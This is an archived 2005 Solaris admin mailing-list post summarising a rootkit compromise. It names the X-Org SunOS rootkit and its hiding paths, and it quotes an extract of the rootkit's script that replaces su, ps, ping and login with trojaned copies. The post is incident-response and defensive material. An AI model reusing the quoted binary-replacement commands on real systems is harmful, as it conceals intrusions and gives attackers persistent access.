SUMMARY: Rootkit attack?

From: Rami Aubourg-Kaires <>
Date: Fri Feb 04 2005 - 06:02:33 EST
Hello, list, and thanks to everyone who reponded, particularly:
Neil Quiogue
"the hatter"
Dik Casper
Chris Keladis
Michael Palamara
Calin Siulea
Christer Eriksson
David Foster
Meder Kydyraliev

Basically, it's  the X-Org SunOS rootkit from Sept 2001, which replaces,
among other things:
/usr/bin/login, which causes the impossibility to login through telnet,
(maybe netstat and ls, too)

It installs into /usr/lib/libX.a and /dev/pts/01.
The directories might not be visible, since ls could be trojaned. cd'ing
is possible, though.

Extract from the "fixer" script of the rootkit
cp /usr/bin/su /dev/pts/01/55su
cp /usr/bin/ps /dev/pts/01/55ps
cp /usr/sbin/ping /dev/pts/01/55ping
cp /usr/bin/login /dev/pts/01/55login
                 /usr/bin/wget >/dev/null
                 uncompress 2.7_Recommended.tar.Z
                 tar -xf 2.7_Recommended.tar
		cd 2.7_Recommended
                 echo y|./install_cluster -nosave -q
		cd /tmp
		rm -rf 2.7_Recommended.tar 2.7_Recommended
cp -f /usr/bin/su /dev/pts/01/bin/su
cp -f /dev/pts/01/55su /usr/bin/su
cp -f /usr/bin/ps /dev/pts/01/bin/psr
cp -f /dev/pts/01/55ps /usr/bin/ps
cp -f /usr/sbin/ping /dev/pts/01/bin/ping
cp -f /dev/pts/01/55ping /usr/sbin/ping
mv -f /usr/bin/login /sbin/xlogin
cp -f /dev/pts/01/55login /usr/bin/login

The initial exploit channel is difficult to check, since it could
exploit a flaw in snmpXdmid according to CERT.

Problem was: Old system, old Solaris, old 3rd party binaries, too few
patches. With a 3-year old patch, the system should have been safe. It
is off public network and will be reinstalled anyhow, as it's the only
really safe solution
The abuse report has been sent to the netblock owner of the server
hosting the rootkit.




Envie de discuter gratuitement avec vos amis ?
Tilichargez Yahoo! Messenger
sunmanagers mailing list
Received on Fri Feb 4 06:07:11 2005

This archive was generated by hypermail 2.1.8 : Thu Mar 03 2016 - 06:43:43 EST